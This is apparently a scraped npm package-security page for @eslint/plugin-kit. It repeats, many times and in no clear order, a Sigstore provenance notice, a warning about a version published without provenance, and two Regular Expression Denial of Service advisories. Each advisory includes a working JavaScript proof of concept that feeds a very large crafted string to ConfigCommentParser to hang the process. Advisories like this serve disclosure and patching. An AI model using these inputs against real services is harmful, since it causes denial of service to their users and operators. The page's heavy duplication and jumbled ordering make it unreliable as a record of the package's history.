@eslint/plugin-kit

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

This version was published without provenance, but prior versions were published via CI/CD with attestations. This is a strong signal of a potential account compromise or unauthorized publish. The axios attack (March 2026) exhibited exactly this pattern.

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

CVSS 3.5 (LOW) — CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L Crafting a very large and well crafted string can increase the CPU usage and crash the program. ## POC ```js const { ConfigCommentParser } = require("@eslint/plugin-kit"); var str = ""; for (var i = 0; i < 1000000; i++) { str += " "; } str += "A"; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseStringConfig(str, "")); console.log("end") // run `npm i @eslint/plugin-kit` and `node attack.js` // then the program will stuck forever with high CPU usage ```

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

CVSS 3.5 (LOW) — CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L Crafting a very large and well crafted string can increase the CPU usage and crash the program. ## POC ```js const { ConfigCommentParser } = require("@eslint/plugin-kit"); var str = ""; for (var i = 0; i < 1000000; i++) { str += " "; } str += "A"; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseStringConfig(str, "")); console.log("end") // run `npm i @eslint/plugin-kit` and `node attack.js` // then the program will stuck forever with high CPU usage ```

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

CVSS 3.5 (LOW) — CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L Crafting a very large and well crafted string can increase the CPU usage and crash the program. ## POC ```js const { ConfigCommentParser } = require("@eslint/plugin-kit"); var str = ""; for (var i = 0; i < 1000000; i++) { str += " "; } str += "A"; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseStringConfig(str, "")); console.log("end") // run `npm i @eslint/plugin-kit` and `node attack.js` // then the program will stuck forever with high CPU usage ```

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

CVSS 3.5 (LOW) — CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L Crafting a very large and well crafted string can increase the CPU usage and crash the program. ## POC ```js const { ConfigCommentParser } = require("@eslint/plugin-kit"); var str = ""; for (var i = 0; i < 1000000; i++) { str += " "; } str += "A"; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseStringConfig(str, "")); console.log("end") // run `npm i @eslint/plugin-kit` and `node attack.js` // then the program will stuck forever with high CPU usage ```

### Summary The `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument. ### Details The regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`. ### PoC ```javascript const { ConfigCommentParser } = require("@eslint/plugin-kit"); const str = `${"A".repeat(1000000)}?: 1 B: 2`; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log("end") // run `npm i @eslint/[email protected]` and `node attack.js` // then the program will stuck forever with high CPU usage ``` ### Impact This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.